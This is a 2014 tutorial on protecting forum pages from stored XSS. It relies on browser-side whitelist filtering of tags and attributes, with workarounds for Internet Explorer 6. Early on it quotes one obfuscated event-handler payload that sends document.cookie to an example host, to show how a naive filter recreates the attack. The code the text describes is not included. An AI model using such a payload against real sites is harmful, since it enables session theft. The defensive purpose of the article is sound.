Frontend protection against Stored XSS Attacks
|Max Petrov||August 2014|
Cross Site Scripting attack is harmful software impact on the user's browser for the purpose of stealing data or causing other harm. To avoid confusion with CSS (Caskading Style Sheets), to denote Cross Site Scripting it was agreed to use the abbreviation XSS.
The solution to the problem seems to be simple. We must prevent the execution in the browser
to neutralize in the messages received from the visitors all the places which explicitly or supposedly
HTML nodes <SCRIPT> . . . </SCRIPT> ,
Event handlers in tags ,
The simplest example. The attacker enters
<p oonmouseovernmouseover='location.href="http://example.com/" + document.cookie'>
The message is sent to the server. On the server the PHP filter sees the dangerous character sequence onmouseover and cuts it out. As a result, not posing any threat (not recognized by browsers) oonmouseovernmouseover turns into an onmouseover. As you can see, the PHP filter did not prevent, but created an XSS attack.
We do not need to build an HTML parser. HTML parsers already exist. They exist in the browsers. By using them, it is attractive to shift the task of recognizing stored XSS attacks (and the protection from them) to the browsers. Then it becomes unnecessary to foresee on the server, whether this or that browser would see the active content in the message posted in the forum. It is more logical to ask the browser. If the browser has detected a script, then we should give the browser an order to neutralize the detected script.
At the end of the loading, the browser should analyze the parts of the text marked by us, secure
them, and only then show to user. We will use the event corresponded to the end of the HTML page
loading. It is called onload and is applicable to the HTML node body. We write as
where getid("message") is a function that accepts id of that node whose content should be analyzed and treated.
MS browser IExplorer of versions 6 or 7 is still used. Based on the Runet statistics, we can estimate the share of IExplorer 6 and 7 as 1% of traffic. Perhaps, these are the most vulnerable browsers. I think the protection should be built in such a manner that it will work starting from IExplorer 6. It does not matter that this will give some roughness in the code.
IExplorer 6 in response to document.getElementByClassName() outputs an object (not a collection of objects, as one might expect). We have to adapt to the weakest. We will receive the fragments of text as IExplorer 6 wants, that is, one at one time. We have to allow many fragments with the same id on one HTML page. This is against the rules, but we will get the cross-browser script.Function getid(id)
Nothing is complex. Each line has explanations (just put the mouse over and a hint will pop up).
Using the methods and properties of DOM, in particular, you can get:
the array of inner HTML nodes,
the name of each inner HTML node,
the names of all the attributes of each HTML node.
div is the name of the HTML node. All the rest (id="a2", class="myclass", contenteditable="true", align="right", onmousemove="alert('onmousemove!')", style="color:green", blablabla="blablabla") is the HTML attributes of div node. All, that is written in the tag according to the form name="value", is an attribute. The attributes will be id, class, style, event handlers, and even nonsense sentence like blablabla = "blablabla". In DOM the attributes are not classified according to their name and value. The attributes of event handlers from the point of view of DOM are not different from other attributes.
Let's apply the white list approach. This is an exhaustive list of allowed tags and attributes. All that does not correspond to the white list, we will destroy ruthlessly. Algorithm. Go through all the child nodes, deleting ones, which are not in the list. In the same way, go through all the attributes of each of the allowed nodes.
Functions of highest order (array.forEach(), array.some()) can not be applied, IExplorer 6 does not understand such functions. We will do simple cycles. In addition, IExplorer 6 for any tag will find the full set of attributes (several dozens), even if there are no attributes in the tag. Therefore, we should track by the property specified whether each attribute is specified explicitly.
Another complication related to IExplorer 6. It is not possible to remove in it event handler attributes, using the node.removeAttribute("attrName"), which is common for other browsers. In explorer it works another way: node.attrName = null. However, then it will be necessary to check (at least on the first characters "on") whether the attribute is an event handler. Otherwise, we'll get an emergency abort of the script if we try to reset to zero any non-zeroable attribute (for example, contentEditable).Function clearhtml(obj) :
The explanations in pop up hints. The concepts tag, node, HTML container are used, as synonyms.
That's all. The code was tested in the browsers: Internet Explorer 6; SlimBrowser 7.00 build 103; Avant Browser 2014 build 7; Firefox 12.0; Safari 5.0.2; Comodo Dragon 18.104.22.168; Opera 18.0; Yandex 13.12.1599.12785; SRWare Iron 6.0.475; Chromium 28.0.1500.75.
For those who would like to use this, without delving into the meaning, below it is given in the form of a recipe that is suitable for rapid application.File script.js :
By red it is highlighted all necessary strings. On the server, the message processing consists
solely in deleting the comment tags (if such tags will be detected). In other words, from the
text to be added to the site, you must always remove (or replace) the character sequences
<!-- and -->. A potentially dangerous fragment must be inserted by server into
<div id ="message"><!-- HERE IS MALICIOUS CONTENT --></div>
Do not forget to write to the tag body the handler onload='getid("message")'. Write the allowed tags and attributes into a script file.
Please, write here your questions, comments, opinions: http://ironburattin.ru/6/index.php .
How to enforce Firefox to update favicon
How to lock CD autorun in Windows XP
Schultz's tables (Shultzstables.exe)
Speed of Forum Engine. Files or Database
The best free programs for reading txt-files on Android smartphones
Why a stupid forum needs a search option?
|© Max Petrov||При использовании материалов ссылка на sadda.ru обязательна|